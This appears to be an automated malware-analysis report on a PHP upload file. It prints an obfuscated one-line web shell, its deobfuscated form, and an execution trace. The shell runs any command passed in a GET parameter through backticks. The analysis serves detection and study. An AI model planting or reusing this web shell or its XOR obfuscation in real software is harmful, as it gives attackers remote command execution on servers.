PHP Malware Analysis
00000000ax.php
md5: bacd225c8ed40f1094d723b7b1b5dcb4
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Input
- _GET (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
echo $_ = "";
$_ = "'";
$_ = "_GET";
$_ = $_GET['0'];
echo `{$_}`;Execution traces
data/traces/bacd225c8ed40f1094d723b7b1b5dcb4_trace-1676237163.001.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:26:28.898821]
1 0 1 0.000155 393528
1 3 0 0.000222 395872 {main} 1 /var/www/html/uploads/00000000ax.php 0 0
1 A /var/www/html/uploads/00000000ax.php 1 $_ = ''
1 A /var/www/html/uploads/00000000ax.php 1 $_ = '\''
2 4 0 0.000264 395872 chr 0 /var/www/html/uploads/00000000ax.php 1 1 120
2 4 1 0.000277 395912
2 4 R 'x'
2 5 0 0.000291 395872 ord 0 /var/www/html/uploads/00000000ax.php 1 1 TRUE
2 5 1 0.000304 395912
2 5 R 49
2 6 0 0.000316 395872 chr 0 /var/www/html/uploads/00000000ax.php 1 1 96
2 6 1 0.000328 395912
2 6 R '`'
2 7 0 0.000341 395904 chr 0 /var/www/html/uploads/00000000ax.php 1 1 98
2 7 1 0.000352 395944
2 7 R 'b'
2 8 0 0.000364 395904 chr 0 /var/www/html/uploads/00000000ax.php 1 1 115
2 8 1 0.000375 395944
2 8 R 's'
1 A /var/www/html/uploads/00000000ax.php 1 $_ = '_GET'
1 A /var/www/html/uploads/00000000ax.php 1 $_ = NULL
2 9 0 0.000428 395872 shell_exec 0 /var/www/html/uploads/00000000ax.php 1 1 ''
2 9 1 0.000455 395904
2 9 R FALSE
1 3 1 0.000469 395872
0.000493 314272
TRACE END [2023-02-12 19:26:28.899193]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>